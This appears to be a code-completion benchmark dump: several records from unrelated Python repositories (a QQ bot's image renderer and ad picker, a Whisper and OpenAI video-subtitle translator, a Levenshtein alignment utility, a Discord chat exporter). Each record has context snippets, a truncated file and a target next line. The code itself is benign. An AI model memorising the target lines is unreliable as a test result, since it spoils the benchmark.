"snippet": "class S3FileService(Service):\n id: str = \"abot/s3file\"\n\n def __init__(\n self,\n endpoint: str = \"127.0.0.1:8333\",\n access_key: str | None = None,\n secret_key: str | None = None,\n *,\n secure: bool = False,\n ) -> None:\n super().__init__()\n self.s3file = S3File(endpoint, access_key, secret_key, secure=secure)\n\n # def get_interface(self, _) -> Minio:\n # return self.s3file\n\n @property\n def required(self) -> set:\n return set()\n\n @property\n def stages(self) -> set[str]:\n return {\"preparing\"}\n\n async def launch(self, _: Launart) -> None:\n async with self.stage(\"preparing\"):\n if await self.s3file.bucket_exists(\"abot7f8befa44d10\"):\n logger.info(\"S3 Bucket 已存在\")\n else:\n logger.info(\"正在创建 S3 Bucket\")\n await self.s3file.make_bucket(\"abot7f8befa44d10\")\n logger.success(\"S3 Bucket 创建成功\")\n\n test_text = secrets.token_hex(16).encode()\n if await self.s3file.object_exists(\".keep\"):\n await self.s3file.remove_object(\".keep\")\n put_test = await self.s3file.put_object(\".keep\", test_text)\n if put_test:\n logger.info(\"S3 Bucket 可写\")\n else:\n logger.error(\"S3 Bucket 不可写\")\n msg = \"S3 Bucket 不可写\"\n raise S3FileError(msg)\n read_test: ClientResponse = await self.s3file.get_object(\".keep\")\n if await read_test.read() == test_text:\n logger.info(\"S3 Bucket 可读\")\n else:\n logger.error(\"S3 Bucket 不可读\")\n msg = \"S3 Bucket 不可读\"\n raise S3FileError(msg)\n\n logger.success(\"S3 Bucket 测试完成\")"
},
{
"identifier": "ADBuilder",
"path": "utils/builder.py",
"snippet": "class ADBuilder(Advertisement):\n @classmethod\n async def create_ad(\n cls,\n content: str,\n content_type: int,\n category: AdvertisementCategory,\n source: str,\n expire_days: int = 30,\n weight: int = 1,\n target_audience: list[str] | None = None,\n bid_price: int = 0,\n ) -> str:\n if target_audience is None:\n target_audience = []\n while True:\n ad_id = token_hex(8)\n if await cls.find_one(cls.ad_id == ad_id):\n continue\n break\n\n await cls.insert(\n Advertisement(\n ad_id=ad_id,\n content=content,\n content_type=content_type,\n ad_category=category,\n source=source,\n end_date=datetime.now(CHINA_TZ) + timedelta(days=expire_days) if expire_days else datetime.max,\n weight=weight,\n target_audience=target_audience,\n bid_price=bid_price,\n )\n )\n return ad_id\n\n # 随机抽取广告\n @classmethod\n async def get_ad(\n cls, category: AdvertisementCategory | None = None, target_audience: list[str] | None = None\n ) -> Advertisement | None:\n if target_audience is None:\n target_audience = []\n current_date = datetime.now(CHINA_TZ)\n\n # 构建查询条件\n query = cls.find(\n Eq(cls.is_active, True),\n LTE(cls.start_date, current_date),\n GT(cls.end_date, current_date),\n )\n\n if category:\n query = query.find(Eq(cls.ad_category, category))\n\n if target_audience:\n query = query.find(In(cls.target_audience, target_audience))\n\n # 计算每个广告的调整后的权重\n ads = await query.to_list()\n\n if not ads:\n return None\n\n adjusted_weights = [math.log1p(ad.bid_price) * math.log1p(ad.weight) for ad in ads]\n total_weight = sum(adjusted_weights)\n\n # 根据权重随机选择广告\n probabilities = [w / total_weight for w in adjusted_weights]\n selected_ad = random.choices(ads, weights=probabilities, k=1)\n\n ctx = Context.current\n cid = ctx.client.last_value\n if ctx.scene.path_without_land in {\"guild.channel\", \"guild.user\"}:\n sid = ctx.scene[\"guild\"]\n else:\n sid = ctx.scene[\"group\"]\n\n selected_ad = selected_ad[0]\n selected_ad.views += 1\n await selected_ad.save() # type: ignore\n selected_ad = cast(Advertisement, selected_ad)\n\n await AdDisplayLog.insert(\n AdDisplayLog(\n ad_id=selected_ad.ad_id,\n scene_id=sid,\n client_id=cid,\n target_audience=list(set(selected_ad.target_audience) & set(target_audience)),\n )\n )\n return selected_ad"
},
{
"identifier": "CHINA_TZ",
"path": "utils/datetime.py",
"snippet": "CHINA_TZ = ZoneInfo(\"Asia/Shanghai\")"
},
{
"identifier": "fill_font",
"path": "utils/fonts_provider.py",
"snippet": "async def fill_font(route: Route, request: Request) -> None:\n url = URL(request.url)\n if not url.is_absolute():\n msg = \"字体地址不合法\"\n raise ValueError(msg)\n try:\n logger.debug(f\"Font {url.name} requested\")\n await route.fulfill(\n path=await get_font(url.name),\n content_type=font_mime_map.get(url.suffix),\n )\n except Exception:\n logger.error(f\"找不到字体 {url.name}\")\n await route.fallback()"
},
{
"identifier": "get_cut_str",
"path": "utils/strings.py",
"snippet": "def get_cut_str(input_str: str, cut: int) -> list[str]:\n \"\"\"\n 自动断行, 用于 Pillow 等不会自动换行的场景\n \"\"\"\n punc = \"\"\",,、。.??)》】“\"‘';;::!!·`~%^& \"\"\" # noqa: RUF001\n si = 0\n i = 0\n next_str = input_str\n str_list = []\n\n while re.search(r\"\\n\\n\\n\\n\\n\", next_str):\n next_str = re.sub(r\"\\n\\n\\n\\n\\n\", \"\\n\", next_str)\n for s in next_str:\n si += 1 if s in string.printable else 2\n i += 1\n if not next_str:\n break\n if next_str[0] == \"\\n\":\n next_str = next_str[1:]\n elif s == \"\\n\":\n str_list.append(next_str[: i - 1])\n next_str = next_str[i - 1 :]\n si = 0\n i = 0\n continue\n if si > cut:\n try:\n if next_str[i] in punc:\n i += 1\n except IndexError:\n str_list.append(next_str)\n return str_list\n str_list.append(next_str[:i])\n next_str = next_str[i:]\n si = 0\n i = 0\n str_list.append(next_str)\n i = 0\n non_wrap_str = []\n for p in str_list:\n if not p:\n break\n if p[-1] == \"\\n\":\n p = p[:-1] # noqa: PLW2901\n non_wrap_str.append(p)\n i += 1\n return non_wrap_str"
}
] | import asyncio
import hashlib
import random
import re
from base64 import b64encode
from datetime import datetime, timedelta
from io import BytesIO
from pathlib import Path
from graiax.text2img.playwright import (
HTMLRenderer,
MarkdownConverter,
PageOption,
ScreenshotOption,
convert_text,
)
from graiax.text2img.playwright.renderer import BuiltinCSS
from jinja2 import Template
from launart import Launart
from loguru import logger
from PIL import Image, ImageDraw, ImageFont
from playwright.async_api._generated import Request
from qrcode.image.styledpil import StyledPilImage
from qrcode.main import QRCode
from models.ad import AdvertisementCategory
from services import AiohttpClientService, S3FileService
from utils.builder import ADBuilder
from utils.datetime import CHINA_TZ
from .fonts_provider import fill_font
from .strings import get_cut_str | 2,936 |
# probability that an advertisement is shown
DEFAULT_AD_PROBABILITY = 0.7
font_file = "./static/font/sarasa-mono-sc-semibold.ttf"
font = ImageFont.truetype(font_file, 22)
cache = Path("cache", "t2i")
cache.mkdir(exist_ok=True, parents=True)
qrcode = QRCode(image_factory=StyledPilImage)
qrcode.add_data("https://qun.qq.com/qunpro/robot/share?robot_appid=101985270")
invite_guild: Image.Image = qrcode.make_image(fill_color="black", back_color="#fafafac0").get_image().resize((200, 200))
bio = BytesIO()
invite_guild.save(bio, format="PNG")
guild_b64 = b64encode(bio.getvalue()).decode()
qrcode.clear()
qrcode.add_data("https://qun.qq.com/qunpro/robot/qunshare?robot_appid=101985270&robot_uin=2854214511")
invite_group: Image.Image = qrcode.make_image(fill_color="black", back_color="#fafafac0").get_image().resize((200, 200))
bio = BytesIO()
invite_group.save(bio, format="PNG")
group_b64 = b64encode(bio.getvalue()).decode()
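# Hedged note (added for clarity): guild_b64 / group_b64 hold base64-encoded PNG data.
# A string like that can be embedded directly in an <img> tag as a data URI, which is
# presumably how the footer template consumes it (the template itself is not shown here):
_example_img_tag = f'<img src="data:image/png;base64,{group_b64}" width="200"/>'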
footer_css = Path("./static/css/footer.css").read_text()
html_render = HTMLRenderer(
page_option=PageOption(device_scale_factor=1.5),
screenshot_option=ScreenshotOption(type="jpeg", quality=80, full_page=True, scale="device"),
css=(
BuiltinCSS.reset,
BuiltinCSS.github,
BuiltinCSS.one_dark,
BuiltinCSS.container,
"@font-face{font-family:'harmo';font-weight:300;"
"src:url('http://font.static.abot/HarmonyOS_Sans_SC_Light.ttf') format('truetype');}"
"@font-face{font-family:'harmo';font-weight:400;"
"src:url('http://font.static.abot/HarmonyOS_Sans_SC_Regular.ttf') format('truetype');}"
"@font-face{font-family:'harmo';font-weight:500;"
"src:url('http://font.static.abot/HarmonyOS_Sans_SC_Medium.ttf') format('truetype');}"
"@font-face{font-family:'harmo';font-weight:600;"
"src:url('http://font.static.abot/HarmonyOS_Sans_SC_Bold.ttf') format('truetype');}"
"*{font-family:'harmo',sans-serif}",
"body{background-color:#fafafac0;}",
"@media(prefers-color-scheme:light){.markdown-body{--color-canvas-default:#fafafac0;}}",
footer_css,
),
page_modifiers=[
|
page_modifiers=[ | lambda page: page.route(re.compile("^http://font.static.abot/(.+)$"), fill_font), | 5 | 2023-12-16 13:19:56+00:00 | 4k |
Chenyme/Chenyme-AAMT | AAMT.py | [
{
"identifier": "generate_srt_from_result",
"path": "utils/utils.py",
"snippet": "def generate_srt_from_result(result): # 格式化为SRT字幕的形式\r\n segments = result['segments']\r\n srt_content = ''\r\n segment_id = 1\r\n for segment in segments:\r\n start_time = int(segment['start'] * 1000)\r\n end_time = int(segment['end'] * 1000)\r\n text = segment['text']\r\n\r\n srt_content += f\"{segment_id}\\n\"\r\n srt_content += f\"{milliseconds_to_srt_time_format(start_time)} --> {milliseconds_to_srt_time_format(end_time)}\\n\"\r\n srt_content += f\"{text}\\n\\n\"\r\n segment_id += 1\r\n\r\n return srt_content\r"
},
{
"identifier": "tmp_filepath",
"path": "utils/utils.py",
"snippet": "def tmp_filepath(uploaded_file): # 虚拟化文件路径\r\n with tempfile.NamedTemporaryFile(delete=False) as tmp_file:\r\n tmp_file.write(uploaded_file.getvalue())\r\n return tmp_file.name\r"
},
{
"identifier": "openai_translate",
"path": "utils/utils.py",
"snippet": "def openai_translate(key, base, result):\r\n llm = ChatOpenAI(openai_api_key=key, openai_api_base=base)\r\n # Prompt\r\n prompt = ChatPromptTemplate(\r\n messages=[\r\n SystemMessagePromptTemplate.from_template(\r\n \"You are a senior translator proficient in Chinese and English. Your task is to translate whatever the user says. You only need to answer the translation result and do not use punctuation marks other than question marks. Please strictly implement it!\"\r\n ),\r\n # The `variable_name` here is what must align with memory\r\n MessagesPlaceholder(variable_name=\"chat_history\"),\r\n HumanMessagePromptTemplate.from_template(\"{question}\"),\r\n ]\r\n )\r\n # 设置记忆参数\r\n memory = ConversationBufferWindowMemory(memory_key=\"chat_history\", return_messages=True, k=5)\r\n conversation = LLMChain(llm=llm, prompt=prompt, verbose=False, memory=memory)\r\n segments = result['segments']\r\n segment_id = 0\r\n for segment in segments:\r\n text = segment['text']\r\n response = conversation({\"question\": text})\r\n result['segments'][segment_id]['text'] = response['text']\r\n segment_id += 1\r\n return result\r"
},
{
"identifier": "srt_mv",
"path": "utils/utils.py",
"snippet": "def srt_mv(cache_dir):\r\n command = ' ffmpeg -i \"' + \"uploaded.mp4\" + '\" -lavfi ' + '\"subtitles=' + 'output.srt' + ':force_style=' + \"'BorderStyle=0,Outline=1,Shadow=0,Fontsize=18'\" + '\"' + ' -y -crf 1 -c:a copy \"' + \"output.mp4\" + '\"'\r\n subprocess.run(command, shell=True, cwd=cache_dir)\r"
},
{
"identifier": "cache",
"path": "utils/utils.py",
"snippet": "def cache(cache_dir):\r\n total_size = 0 # 总大小,初始为0\r\n for root, dirs, files in os.walk(cache_dir): # 遍历文件夹中的所有文件和子文件夹\r\n for file_name in files:\r\n file_path = os.path.join(root, file_name)\r\n total_size += os.path.getsize(file_path)\r\n return total_size\r"
},
{
"identifier": "convert_size",
"path": "utils/utils.py",
"snippet": "def convert_size(size):\r\n if size == 0:\r\n return \"0B\"\r\n size_names = (\"B\", \"KB\", \"MB\", \"GB\", \"TB\", \"PB\", \"EB\", \"ZB\", \"YB\")\r\n i = int(math.floor(math.log(size, 1024)))\r\n power = math.pow(1024, i)\r\n size = round(size / power, 2)\r\n return f\"{size} {size_names[i]}\"\r"
}
] | import os
import json
import streamlit as st
import whisper
from utils.utils import generate_srt_from_result, tmp_filepath, openai_translate, srt_mv, cache, convert_size
 | 2,123 | # Author: chenyme
# Version: v0.2.2
# Blog: to be updated
st.set_page_config(
page_title="AAMT v0.2.2",
page_icon="📊",
layout="wide", # use the wide layout
initial_sidebar_state="expanded" # start with the sidebar expanded
)
st.title("Chenyme-AAMT")
st.write("##### AI全自动视频翻译")
with st.sidebar:
st.title("欢迎!")
st.write('''
### 尊敬的用户,恭喜你完成了该项目的安装!
欢迎您使用AAMT V0.2.2!本项目的目标是为您提供一个简单易用的全自动视频翻译工具,以便您能够快速地将翻译后的字幕与原视频合并,从而更轻松地享受翻译后的内容。
请注意以下事项:
1. 请确保您的系统已正确安装Python,并且版本号为3.8或更高。
2. 请确保已经安装了所有依赖库,并设置了ffmpeg为环境变量。
3. 如果在安装或运行过程中遇到任何问题,请查阅项目文档或联系开发人员以获取帮助。
''')
dir_1 = os.path.dirname(os.path.abspath(__file__))
dir_2 = dir_1.replace("\\", "/")
config_dir = dir_2 + "/config/"
cache_dir = dir_2 + "/cache/"
print("当前项目的配置文件:", config_dir)
print("当前项目的缓存位置:", cache_dir)
with open(config_dir + "config.json", 'r') as file: # load the configuration
config = json.load(file)
tab1, tab2, tab3 = st.tabs(["主页", "设置", "关于"])
with tab1:
# file upload logic
uploaded_file = st.file_uploader("请在这里上传视频:", type=['mp4', 'mov'])
if uploaded_file is not None:
with open(cache_dir + "uploaded.mp4", "wb") as file:
file.write(uploaded_file.getbuffer())
st.success("上传成功")
if st.button('运行程序'):
if uploaded_file is not None:
with st.spinner('Wait for it...'):
# transcribe with whisper
model = whisper.load_model(st.session_state.option)
pathvideo = tmp_filepath(uploaded_file)
result = model.transcribe(pathvideo)
print("whisper识别:" + result['text']) # source-language text recognized by whisper
result = openai_translate(st.session_state.key, st.session_state.base, result) # translate into the target language
srt_content = generate_srt_from_result(result) # build the SRT subtitle content
with open(cache_dir + "output.srt", 'w', encoding='utf-8') as srt_file: # write the SRT content to an SRT file
srt_file.write(srt_content)
srt_mv(cache_dir)
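# Hedged illustration (added for clarity): generate_srt_from_result() above writes
# standard SRT blocks, one per whisper segment, roughly like:
#   1
#   00:00:00,000 --> 00:00:02,500
#   translated text of the first segment
#
# The exact timestamp string comes from milliseconds_to_srt_time_format(), which is
# not shown here, so the values above are only an assumed example.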
if st.download_button(
label="Click to Download SRT",
data=srt_content.encode('utf-8'),
key='srt_download',
file_name=cache_dir + 'output.srt',
mime='text/srt',
):
st.success("下载成功")
video_file = open(cache_dir + "output.mp4", 'rb')
video_bytes = video_file.read()
st.video(video_bytes)
else:
st.error("请先上传视频!")
# global settings
with tab2:
openai_api_key = config["openai_key"]
openai_api_base = config["openai_base"]
whisper_model = config["whisper_model_default"]
st.write("#### Whisper识别设置")
model = {'tiny': 0, 'base': 1, 'small': 2, 'medium': 3, 'large': 4}
option = st.selectbox('选择你要使用的识别模型', ('tiny', 'base', 'small', 'medium', 'large'), index=model[whisper_model])
if option != whisper_model:
config["whisper_model_default"] = option
with open(config_dir + "config.json", 'w') as file:
json.dump(config, file, indent=4)
st.success("默认模型已切换为:" + option)
st.write("#### OPENAI设置")
new_key = st.text_input("OPENAI-API-KEY:")
new_base = st.text_input("OPENAI-API-BASE:")
if st.button("保存"):
if new_base != openai_api_base and new_base != "":
config["openai_base"] = new_base
openai_api_base = new_base
if new_key != openai_api_key and new_key != "":
config["openai_key"] = new_key
openai_api_key = new_key
with open(config_dir + "config.json", 'w') as file:
json.dump(config, file, indent=4)
st.success("已保存")
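# Hedged note (added for clarity): the code above only reads and writes the keys
# "openai_key", "openai_base" and "whisper_model_default", so config/config.json is
# presumably shaped like this sketch (values are placeholders, not real credentials):
# {
#     "openai_key": "sk-...",
#     "openai_base": "https://api.openai.com/v1",
#     "whisper_model_default": "base"
# }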
st.write("#### 本地缓存")
 | # Author: chenyme
| st.write(f"本地缓存已占用:{convert_size(cache(cache_dir))}")
| 4 | 2023-12-18 04:06:03+00:00 | 4k |
allenai/marg-reviewer | review_worker/aries/util/edit.py | [
{
"identifier": "colorify",
"path": "review_worker/aries/util/color.py",
"snippet": "def colorify(s: str, color: str, bold: bool = False, form=\"html\", tag_side=\"both\"):\n \"\"\"if tag_side is 'left', only the left tag is added. If tag_side irght\n 'right', only the right tag is added. This is useful if, for example,\n a list of tokens needs to be colored without joining the tokens. Raises an\n error if this is not possible for the given form.\"\"\"\n if color is None or form == \"none\":\n return s\n\n m = re.match(r\"#(?P<hexcode>[0-9a-fA-F]{6})\", color)\n valid_ansi = False\n if not m:\n if color in COLOR_TABLE:\n valid_ansi = True\n hex_color = COLOR_TABLE[color][\"hex\"]\n else:\n raise ValueError(\"Invalid color {}\".format(color))\n else:\n hex_color = m.group(\"hexcode\")\n\n left_tag, right_tag = \"\", \"\"\n if form == \"html\":\n bold_code = \"font-weight: bold;\" if bold else \"\"\n left_tag = '<span style=\"color: #{code};{boldness}\">'.format(code=hex_color, boldness=bold_code)\n right_tag = \"</span>\"\n elif form == \"ansi\" and valid_ansi:\n bold_code = \"1\" if bold else \"0\"\n left_tag = \"\\033[{boldness};{code}m\".format(code=COLOR_TABLE[color][\"ansi\"], boldness=bold_code)\n right_tag = \"\\033[0m\"\n else:\n raise ValueError(\"Invalid format {}\".format(form))\n\n if tag_side == \"left\":\n return left_tag + s\n elif tag_side == \"right\":\n return s + right_tag\n elif tag_side == \"both\":\n return left_tag + s + right_tag\n raise ValueError(\"Invalid tag_side {}\".format(tag_side))"
},
{
"identifier": "colorprint",
"path": "review_worker/aries/util/color.py",
"snippet": "def colorprint(s, color=None, bold=False, form=\"ansi\", *print_args, **print_kwargs):\n return print(colorify(s, color, bold=bold, form=form), *print_args, **print_kwargs)"
}
] | import collections
import difflib
import itertools
import numpy as np
import tqdm
from typing import Iterable, List, Tuple, Union
from cffi import FFI
from .color import colorify, colorprint
from _levenshtein import ffi, lib | 2,495 |
if isinstance(seq1, str):
seq1 = [ord(c) for c in seq1]
if isinstance(seq2, str):
seq2 = [ord(c) for c in seq2]
if len(seq1) > len(seq2):
seq1, seq2 = seq2, seq1
# Important: these arrs need to be in their own variables, NOT inlined with
# the levenshtein_ffi.from_buffer, or else the GC will free the memory and
# memory will get corrupted (often manifests as seq2 overwriting seq1, but
# also can segfault)
seq1_arr = np.array(seq1, dtype=np.int32)
seq2_arr = np.array(seq2, dtype=np.int32)
v0_arr = np.zeros(len(seq2) + 1, dtype=np.int32)
seq1_buf = levenshtein_ffi.cast("int*", levenshtein_ffi.from_buffer(seq1_arr))
seq2_buf = levenshtein_ffi.cast("int*", levenshtein_ffi.from_buffer(seq2_arr))
v0 = levenshtein_ffi.cast("int*", levenshtein_ffi.from_buffer(v0_arr))
result = levenshtein_lib.levenshtein(seq1_buf, len(seq1), seq2_buf, len(seq2), v0)
return result
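# Hedged usage sketch (added for clarity, not part of the original module): the function
# accepts strings or integer sequences and returns a plain edit distance, so once the C
# extension has been built the classic example should hold:
#   levenshtein_distance("kitten", "sitting") == 3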
def basic_token_align(seq1, seq2, seq2_ignored_ids: Iterable = None):
"""Aligns the tokens of seq1 and seq2 assuming that seq2 contains all the
characters of seq1, but possibly with some extra tokens (e.g., special
whitespace markers from a huggingface transformers tokenizer) and possibly
partitioned differently.
In cases where the boundaries are mismatched, this maps to the token with
largest overlap, and breaks ties in favor of earlier tokens.
if seq2_ignored_ids is given, the specified token indexes in seq2 are
ignored and will not be aligned to anything in seq1.
Returns a tuple (dist, alignment) where dist is the total of mismatches
(number of characters that seq2 token boundaries had to be moved to
complete alignment) and `alignment` is a list of the same length as seq2
containing the indexes of the aligned tokens from seq1 (or None if the
token did not overlap seq1 at all)."""
if seq2_ignored_ids is None:
seq2_ignored_ids = set()
# if seq1[0] == 'numerous':
# breakpoint()
seq1idxs = list(itertools.chain(*[[(idx, c) for c in tok] for idx, tok in enumerate(seq1)]))
seq2idxs = list(itertools.chain(*[[(idx, c) for c in tok] for idx, tok in enumerate(seq2)]))
seq2_seq1_char_align = [None] * len(seq2idxs)
idx1 = 0
last_valid = None
for chridx2, (idx2, c2) in enumerate(seq2idxs):
if idx1 >= len(seq1idxs):
break
if c2 == seq1idxs[idx1][1] and idx2 not in seq2_ignored_ids:
seq2_seq1_char_align[chridx2] = idx1
last_valid = idx1
idx1 += 1
# Ensure that all chars of seq1 were mapped to a char in seq2
# if ''.join(seq1) != ''.join(seq2):
if last_valid != (len(seq1idxs) - 1):
raise ValueError("Cannot align: Sequences didn't contain the same characters")
# Align the sequences
alignment_counts = {idx: collections.Counter() for idx in range(len(seq2))}
# for idx1, idx2 in zip(seq1idxs, seq2idxs):
for chridx1, (idx2, c2) in zip(seq2_seq1_char_align, seq2idxs):
idx1 = seq1idxs[chridx1][0] if chridx1 is not None else None
alignment_counts[idx2][idx1] += 1
alignments = []
n_mismatch_total = 0
for idx2 in range(len(seq2)):
best_idxs = sorted(
alignment_counts[idx2].keys(), reverse=True, key=lambda x: (alignment_counts[idx2][x], -x if x is not None else float("-inf"))
)
best_idx1 = best_idxs[0]
if best_idx1 is None and len(best_idxs) > 1:
best_idx1 = best_idxs[1]
n_mismatch_total += sum(alignment_counts[idx2].values()) - alignment_counts[idx2][best_idx1]
alignments.append(best_idx1)
return (n_mismatch_total, alignments)
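# Hedged worked example (added for clarity, not part of the original module), tracing
# the tie-breaking described in the docstring: the seq2 token "bc" overlaps both seq1
# tokens by one character, so it maps to the earlier one and one mismatched character
# is counted:
#   basic_token_align(["ab", "cd"], ["a", "bc", "d"]) -> (1, [0, 0, 1])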
def print_word_diff(text1, text2, color_format="ansi", **print_kwargs):
print(make_word_diff(text1, text2, color_format=color_format), **print_kwargs)
def make_word_diff(text1, text2, color_format="ansi"):
if not isinstance(text1, list):
text1 = text1.split(" ") if len(text1) != 0 else []
if not isinstance(text2, list):
text2 = text2.split(" ") if len(text2) != 0 else []
prevtok = " "
parity = 0
def color_for_tok(tok):
if color_format == "none":
return None
if tok == "+":
return "green"
elif tok == "-":
return "red"
elif tok == "?":
return "blue"
return None
s = ""
for idx, x in enumerate(difflib.ndiff(text1, text2)):
if prevtok != x[0] and prevtok in ("+", "-"):
|
def init_levenshtein_c():
ffibuilder = FFI()
ffibuilder.set_source(
"_levenshtein",
r"""
int levenshtein(int *seq1, int seq1_len, int *seq2, int seq2_len, int *v0)
{
// Adapted from https://en.wikipedia.org/wiki/Levenshtein_distance (CC-BY-SA)
// v0 is just a buffer for temporary calculations; easier to
// ask the caller to allocate it than to deal with C mem
// management
int substitutionCost, insertionCost, deletionCost;
int tmpval;
for (int i = 0; i < seq2_len+1; i++) {
v0[i] = i;
}
for (int i = 0; i < seq1_len; i++) {
// calculate v1 (current row distances) from the previous row v0
// first element of v1 is A[i+1][0]
// edit distance is delete (i+1) chars from s to match empty t
tmpval = i + 1;
// use formula to fill in the rest of the row
for(int j = 0; j < seq2_len; j++) {
// calculating costs for A[i+1][j+1]
deletionCost = v0[j + 1] + 1;
insertionCost = tmpval + 1;
substitutionCost = v0[j];
if (seq1[i] != seq2[j]) {
substitutionCost++;
}
v0[j] = tmpval;
tmpval = deletionCost;
if (insertionCost < tmpval) {
tmpval = insertionCost;
}
if (substitutionCost < tmpval) {
tmpval = substitutionCost;
}
}
v0[seq2_len] = tmpval;
}
// after the last swap, the results of v1 are now in v0
return v0[seq2_len];
}
""",
)
ffibuilder.cdef("int levenshtein(int*, int, int*, int, int*);")
# Compile the C module and import it
    ffibuilder.compile(verbose=True)
    # The compiled extension module exposes the cffi handles returned below.
    from _levenshtein import ffi, lib
    return ffi, lib
levenshtein_ffi, levenshtein_lib = None, None
def levenshtein_distance(seq1, seq2):
# We call a C function for levenshtein via CFFI because it is about 1000x
# faster than the python version (the difference between running in an hour
# vs running in a month)
global levenshtein_ffi, levenshtein_lib
if levenshtein_ffi is None:
levenshtein_ffi, levenshtein_lib = init_levenshtein_c()
if isinstance(seq1, str):
seq1 = [ord(c) for c in seq1]
if isinstance(seq2, str):
seq2 = [ord(c) for c in seq2]
if len(seq1) > len(seq2):
seq1, seq2 = seq2, seq1
# Important: these arrs need to be in their own variables, NOT inlined with
# the levenshtein_ffi.from_buffer, or else the GC will free the memory and
# memory will get corrupted (often manifests as seq2 overwriting seq1, but
# also can segfault)
seq1_arr = np.array(seq1, dtype=np.int32)
seq2_arr = np.array(seq2, dtype=np.int32)
v0_arr = np.zeros(len(seq2) + 1, dtype=np.int32)
seq1_buf = levenshtein_ffi.cast("int*", levenshtein_ffi.from_buffer(seq1_arr))
seq2_buf = levenshtein_ffi.cast("int*", levenshtein_ffi.from_buffer(seq2_arr))
v0 = levenshtein_ffi.cast("int*", levenshtein_ffi.from_buffer(v0_arr))
result = levenshtein_lib.levenshtein(seq1_buf, len(seq1), seq2_buf, len(seq2), v0)
return result
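# Illustrative note (not part of the original module): because of the ord()
# conversion above, plain strings can be passed directly, e.g.
# levenshtein_distance("kitten", "sitting") evaluates to 3.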
def basic_token_align(seq1, seq2, seq2_ignored_ids: Iterable = None):
"""Aligns the tokens of seq1 and seq2 assuming that seq2 contains all the
characters of seq1, but possibly with some extra tokens (e.g., special
whitespace markers from a huggingface transformers tokenizer) and possibly
partitioned differently.
In cases where the boundaries are mismatched, this maps to the token with
largest overlap, and breaks ties in favor of earlier tokens.
if seq2_ignored_ids is given, the specified token indexes in seq2 are
ignored and will not be aligned to anything in seq1.
Returns a tuple (dist, alignment) where dist is the total of mismatches
(number of characters that seq2 token boundaries had to be moved to
complete alignment) and `alignment` is a list of the same length as seq2
containing the indexes of the aligned tokens from seq1 (or None if the
token did not overlap seq1 at all)."""
if seq2_ignored_ids is None:
seq2_ignored_ids = set()
# if seq1[0] == 'numerous':
# breakpoint()
seq1idxs = list(itertools.chain(*[[(idx, c) for c in tok] for idx, tok in enumerate(seq1)]))
seq2idxs = list(itertools.chain(*[[(idx, c) for c in tok] for idx, tok in enumerate(seq2)]))
seq2_seq1_char_align = [None] * len(seq2idxs)
idx1 = 0
last_valid = None
for chridx2, (idx2, c2) in enumerate(seq2idxs):
if idx1 >= len(seq1idxs):
break
if c2 == seq1idxs[idx1][1] and idx2 not in seq2_ignored_ids:
seq2_seq1_char_align[chridx2] = idx1
last_valid = idx1
idx1 += 1
# Ensure that all chars of seq1 were mapped to a char in seq2
# if ''.join(seq1) != ''.join(seq2):
if last_valid != (len(seq1idxs) - 1):
raise ValueError("Cannot align: Sequences didn't contain the same characters")
# Align the sequences
alignment_counts = {idx: collections.Counter() for idx in range(len(seq2))}
# for idx1, idx2 in zip(seq1idxs, seq2idxs):
for chridx1, (idx2, c2) in zip(seq2_seq1_char_align, seq2idxs):
idx1 = seq1idxs[chridx1][0] if chridx1 is not None else None
alignment_counts[idx2][idx1] += 1
alignments = []
n_mismatch_total = 0
for idx2 in range(len(seq2)):
best_idxs = sorted(
alignment_counts[idx2].keys(), reverse=True, key=lambda x: (alignment_counts[idx2][x], -x if x is not None else float("-inf"))
)
best_idx1 = best_idxs[0]
if best_idx1 is None and len(best_idxs) > 1:
best_idx1 = best_idxs[1]
n_mismatch_total += sum(alignment_counts[idx2].values()) - alignment_counts[idx2][best_idx1]
alignments.append(best_idx1)
return (n_mismatch_total, alignments)
def print_word_diff(text1, text2, color_format="ansi", **print_kwargs):
print(make_word_diff(text1, text2, color_format=color_format), **print_kwargs)
def make_word_diff(text1, text2, color_format="ansi"):
if not isinstance(text1, list):
text1 = text1.split(" ") if len(text1) != 0 else []
if not isinstance(text2, list):
text2 = text2.split(" ") if len(text2) != 0 else []
prevtok = " "
parity = 0
def color_for_tok(tok):
if color_format == "none":
return None
if tok == "+":
return "green"
elif tok == "-":
return "red"
elif tok == "?":
return "blue"
return None
s = ""
for idx, x in enumerate(difflib.ndiff(text1, text2)):
if prevtok != x[0] and prevtok in ("+", "-"): | s += colorify(prevtok + "]", color=color_for_tok(prevtok), form=color_format) | 0 | 2023-12-20 06:54:14+00:00 | 4k |
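A toy call makes the alignment contract above concrete. The sketch below is illustrative only (the token lists are invented) and assumes basic_token_align from the file above is in scope; it aligns a word-level split against a subword-style re-partition of the same characters.

    word_tokens = ["New", "York", "is", "big"]
    subword_tokens = ["New", "York", "is", "bi", "g"]
    dist, alignment = basic_token_align(word_tokens, subword_tokens)
    assert dist == 0                      # no boundary characters had to move
    assert alignment == [0, 1, 2, 3, 3]   # "bi" and "g" both map back to "big"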
Varexa/Gateway | chat_exporter/construct/transcript.py | [
{
"identifier": "discord",
"path": "chat_exporter/ext/discord_import.py",
"snippet": ""
},
{
"identifier": "gather_messages",
"path": "chat_exporter/construct/message.py",
"snippet": "async def gather_messages(\r\n messages: List[discord.Message],\r\n guild: discord.Guild,\r\n pytz_timezone,\r\n military_time,\r\n) -> (str, dict):\r\n message_html: str = \"\"\r\n meta_data: dict = {}\r\n previous_message: Optional[discord.Message] = None\r\n\r\n for message in messages:\r\n content_html, meta_data = await MessageConstruct(\r\n message,\r\n previous_message,\r\n pytz_timezone,\r\n military_time,\r\n guild,\r\n meta_data\r\n ).construct_message()\r\n message_html += content_html\r\n previous_message = message\r\n\r\n message_html += \"</div>\"\r\n return message_html, meta_data\r"
},
{
"identifier": "Component",
"path": "chat_exporter/construct/assets/component.py",
